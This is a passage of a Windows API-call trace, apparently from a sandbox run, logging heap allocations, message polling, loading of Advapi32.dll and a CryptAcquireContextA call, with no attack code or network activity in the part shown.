0x43cb0c0 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.522] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0082.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d10 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0082.523] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb378 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0082.523] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0082.523] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb150 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0082.523] PeekMessageW (in: lpMsg=0x144e304, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e304) returned 0 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0082.523] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.523] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.524] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.524] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bd0 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bd0 | out: hHeap=0x1780000) returned 1 [0082.524] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.524] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.524] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0082.525] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2d10 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb150 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0082.525] PeekMessageW (in: lpMsg=0x144e4cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4cc) returned 0 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.525] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c40 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.525] PeekMessageW (in: lpMsg=0x144e4cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4cc) returned 0 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.525] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d10 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.526] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.526] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.526] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.526] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0082.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb468 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0082.527] PeekMessageW (in: lpMsg=0x144e0d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e0d4) returned 0 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bc0 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c20 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c90 [0082.527] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.527] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.528] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37e8 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36b0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.528] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0082.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796de8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.529] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0082.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3860 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.529] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.529] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0082.530] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4948) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.530] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 